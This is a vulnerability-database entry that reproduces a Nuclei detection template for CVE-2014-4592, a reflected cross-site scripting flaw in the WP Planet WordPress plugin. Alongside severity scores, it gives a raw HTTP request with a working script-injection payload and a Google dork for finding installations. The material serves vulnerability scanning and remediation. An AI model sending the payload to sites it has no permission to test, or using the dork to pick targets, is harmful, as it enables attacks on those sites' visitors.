Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2014-4592
HistorySep 27, 2021 - 11:02 a.m.

WP Planet <= 0.1 - Cross-Site Scripting

2021-09-2711:02:48
ProjectDiscovery
github.com

4.3 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

0.001 Low

EPSS

Percentile

49.1%

A cross-site scripting vulnerability in rss.class/scripts/magpie_debug.php in the WP-Planet plugin 0.1 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the url parameter.
id: CVE-2014-4592

info:
  name: WP Planet <= 0.1 - Cross-Site Scripting
  author: daffainfo
  severity: medium
  description: |
    A cross-site scripting vulnerability in rss.class/scripts/magpie_debug.php in the WP-Planet plugin 0.1 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the url parameter.
  remediation: |
    Update to the latest version of WP Planet plugin (0.1 or higher) or apply the vendor-supplied patch to fix the vulnerability.
  reference:
    - https://wpscan.com/vulnerability/3c9a3a97-8157-4976-8148-587d923e1fb3
    - https://nvd.nist.gov/vuln/detail/CVE-2014-4592
    - http://codevigilant.com/disclosure/wp-plugin-wp-planet-a3-cross-site-scripting-xss
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2014-4592
    cwe-id: CWE-79
    epss-score: 0.00135
    epss-percentile: 0.48718
    cpe: cpe:2.3:a:czepol:wp-planet:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 2
    vendor: czepol
    product: wp-planet
    framework: wordpress
    google-query: inurl:"/wp-content/plugins/wp-planet"
  tags: cve2014,cve,wordpress,wp-plugin,xss,wpscan,unauth,czepol

http:
  - raw:
      - |
        GET /wp-content/plugins//wp-planet/readme.txt HTTP/1.1
        Host: {{Hostname}}
      - |
        GET /wp-content/plugins/wp-planet/rss.class/scripts/magpie_debug.php?url=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body_1
        words:
          - "WP Planet"

      - type: word
        part: body_2
        words:
          - "<script>alert(document.domain)</script>"

      - type: word
        part: header_2
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 4a0a00473045022077481966c450edd18ee9b5bd7cf27a6eb455f479a6b90d8599c0b11f7285f63d0221008d427a5a6faf2554c216e4025cb7c3a9a58217dbea37d4fc696acd9c44278f2b:922c64590222798bb761d5b6d8e72950

4.3 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

0.001 Low

EPSS

Percentile

49.1%

Related for NUCLEI:CVE-2014-4592